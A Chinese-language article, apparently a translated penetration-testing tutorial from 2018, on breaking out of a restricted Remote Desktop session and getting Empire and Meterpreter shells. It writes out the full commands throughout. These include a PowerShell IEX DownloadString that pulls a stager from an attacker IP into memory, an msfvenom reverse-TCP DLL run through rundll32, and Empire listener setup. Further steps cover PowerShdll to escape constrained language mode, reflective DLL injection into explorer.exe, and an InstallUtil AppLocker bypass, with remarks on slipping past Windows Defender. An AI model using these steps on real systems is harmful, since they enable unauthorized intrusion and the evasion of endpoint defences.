从远程桌面服务到获取Empire Shell

本文将为大家详细介绍如何在只能访问远程桌面服务,且有 AppLocker 保护 PowerShell 处于语言约束模式下获取目标机器 Empire shell。PowerShell 处于语言约束模式,可以防止大多数PowerShell 技巧的使用。另外,还有 Windows Defender 也是我们必须要面对和解决的问题。

环境要求:

RDS服务器放行80端口出站流量。 .Net v3.5(用于PowerShdll中的dll模式)

注:powershell.exe不是Powershell。它只托管包含PowerShell的程序集并处理I/O.System.Management.Automation.dll

有关更多信息,请阅读原文获取文末链接。

从 RDS notepad 获取 shell

https://blog.netspi.com/breaking-out-of-applications-deployed-via-terminal-services-citrix-and-kiosks/ https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/

在记事本界面菜单栏依次选择帮助 -> 查看帮助 -> 触发IE浏览器打开

右键单击IE中的任意链接 ->将目标另存为 ->在桌面上另存为lol.ps1

点击IE中的查看下载,按下文件的下拉列表,打开 -> 记事本。只需在文件中写入powershell.exe并再次保存。

现在,我们再次在IE中右键单击 ->“将目标另存为”。转到下拉菜单“保存类型”,然后选择“所有文件”。你已保存的ps1文件将被显示,你可以选择“运行 PowerShell”这会弹出一个PowerShell命令提示符。但当前的PowerShell提示符处于语言约束模式。我们可以通过自动化变量$ExecutionContext.SessionState.LanguageMode进行验证,可以看到结果为ConstrainedLanguage。

绕过 PoSh 约束模式

首先,我们从https://github.com/p3nt4/PowerShdll下载PowerShdll。然后使用python -m SimpleHTTPServer 80在Kali Web服务器上托管powershdll.dll。接着,在IE中打开http://10.7.253.10/PowerShdll.dll。最后,将其保存为 -> PowerShdll.dll(可以保存在任何文件夹下)。C:\Windows\Tasks文件夹是一个绕过Applocker的好地方,因为该目录通常被列为白名单。但导航到文件夹也可能受到限制,因此在某些情况下你可能需要将其保存到C:\Users\Username\Desktop(桌面)。

我还不确定如何在Applocked环境中检查DLL规则。

现在,我们将PowerShell提示符导航至桌面,并使用rundll32来执行dll。

rundll32 .\PowerShdll.dll,main -w

此时,应该会弹出一个新的交互式PowerShell提示符。我们再次通过自动化变量$ExecutionContext.SessionState.LanguageMode进行验证,可以看到现在已经变为了FullLanguage(完整语言模式)。

更简单的方法

直到后来我才发现,其实完全可以省去最后两步的操作。只需使用set Base64 false和set Outfile shell生成一个Empire stager即可。现在从不受限的PowerShell中,下载shell并将其直接执行到内存中。

IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.18/shell');

如果你够幸运Defender将不会拦截,并且你将获取到一个Empire shell/agent。

获取 meterpreter shell

生成一个dll payload:

msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=10.10.14.2 lport=8081 -f dll -o msf.dll

设置msf侦听程序,使用相同的payload,主机和端口。

use multi/handler
set host tun0
set port 8081
set payload windows/x64/meterpreter/reverse_tcp
exploit

使用之前的IE“另存为”技巧下载msf.dll。

出于某种原因,Windows Defender并没有拦截我的payload。可能是因为payload的x64签名尚未被Defender识别为恶意软件,具体我也不是很清楚。

现在,我们使用rundll32来执行dll。之所以使用rundll32,是因为它是一个不会被Applocker阻止的二进制文件。

rundll32 .\msf.dll,Control_RunDLL

成功获取到了meterpreter shell。

没有 powershell.exe 的 Empire

假设您已建立了一个metasploit会话。

在Empire中,创建一个empire listener 和 stager。最重要的是将Base64设置为false,防止stager调用powershell.exe。由于受限的语言模式,将导致powershell.exe无法在此处运行。

uselistener http
set Host 10.7.253.18
set Port 4444
execute
back
usestager multi/launcher
set Base64 false
generate

现在在MSF中:

load powershell
powershell_shell

在交互式shell中复制粘贴empire listener,在Empire中应该会生成一个agent代理。

更多高级技术

绕过 powershell 约束模式和 applocker

以下是一篇关于绕过应用白名单和powershell约束模式的文章,大家可以阅读下:

https://improsec.com/blog/babushka-dolls-or-how-to-bypass-application-whitelisting-and-constrained-powershell

1.使用windows/hta生成一个listener和hta stager。 2.在visual studio中打开ReflectivePick project。在适当的位置添加hta base64 shell stager,并将dll编译为ReflectivePick_x64.dll。 3.使用以下PS命令将DLL编码为base64,并将结果通过管道传输到一个文本文件中。

$Content = Get-Content .\ReflectivePick_x64.dll -Encoding Byte
$Encoded = [System.Convert]::ToBase64String($Content)
$Encoded | Out-File "C:\Windows\Tasks\dll.txt"

4.复制粘贴dll.txt的内容到Invoke-ReflectivePEInjection.ps1的新变量中。

$dllData = "DLLBASE64_GOES_HERE"
$ProcId = (Get-Process explorer).Id
$Bytes = [System.Convert]::FromBase64String($dllData)
Invoke-ReflectivePEInjection -PEBytes $Bytes -ProcId $ProcId

5.使用https://www.base64encode.org/在线Base64编码整个脚本。打开VS中的Bypass project,并将编码后的内容复制粘贴到encoded变量中。使用VS将其编译为Bypass.exe。 6.使用installutil.exe执行bypass.exe

set-location \\tsclient\lkylabs
copy-item .\Bypass.exe c:\windows\tasks
cd c:\windows\tasks
C:\windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\Bypass.exe

*参考来源:chryzsh,FB小编 secist 编译,转载请注明来自FreeBuf.COM

原文发布于微信公众号 - FreeBuf(freebuf)

原文发表时间:2018-10-14

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏逍遥剑客的游戏开发

基于Unity的编辑器开发(二): 进程间通信

先要做的, 是需要编辑器和Unity共享一部部分代码, 至少协议定义和解析我不想写两遍. 虽然有protobuf这样的工具库, 但是如果不是跨语言的话, 我觉得...

52016
来自专栏蜉蝣禅修之道

WebP图片制作GUI工具

4116
来自专栏Golang语言社区

Golang语言-基础知识-【环境设置】

本地环境设置 在这里我们介绍设置Go编程语言环境,需要在你的计算机上的准备以下两个软件,(A)文本编辑器和(B)Go编译器。 文本编辑器 这将用来键入程序。一些...

2766
来自专栏陈树义

如何快速查看服务器配置信息?

作为一个开发,与服务器打交道的时间肯定不少,很多时候也需要了解一下服务器的配置信息。在 Windows 系统上,我们可以通过「鲁大师」很轻松地查询到电脑的配置...

8735
来自专栏jessetalks

C#移动跨平台开发(2)Xamarin移动跨平台解决方案是如何工作的?

概述   上一篇 C#移动跨平台开发(1)环境准备发布之后不久,无独有偶,微软宣布了开放.NET框架源代码并且会为Windows、Mac和Linux开发一个核心...

37211
来自专栏高性能服务器开发

(六)关于网络编程的一些实用技巧和细节

这些年,接触了形形色色的项目,写了不少网络编程的代码,从windows到linux,跌进了不少坑,由于网络编程涉及很多细节和技巧,一直想写篇文章来总结下这方面的...

4265
来自专栏老马寒门IT

开发者的如何优雅的使用OSX

Mac对于IT开发者来说是最好的开发工具,没有之一。

23710
来自专栏编程

6款好用的C语言编译器推荐

一些刚开始接触C语言编译的网友想下载一款C语言编译器来使用,不过,网络上有不少C语言编译器相关的软件,让人很难抉择。那么,C语言编译器哪个好?今天的文章里,我给...

8748
来自专栏小曾

.Net Web开发技术栈

有很多朋友有的因为兴趣,有的因为生计而走向了.Net中,有很多朋友想学,但是又不知道怎么学,学什么,怎么系统的学,为此我以我微薄之力总结归纳写了一篇.Net w...

3103
来自专栏高性能服务器开发

(六)关于网络编程的一些实用技巧和细节

这些年,接触了形形色色的项目,写了不少网络编程的代码,从windows到linux,跌进了不少坑,由于网络编程涉及很多细节和技巧,一直想写篇文章来总结下这方面的...

3837

扫码关注云+社区

领取腾讯云代金券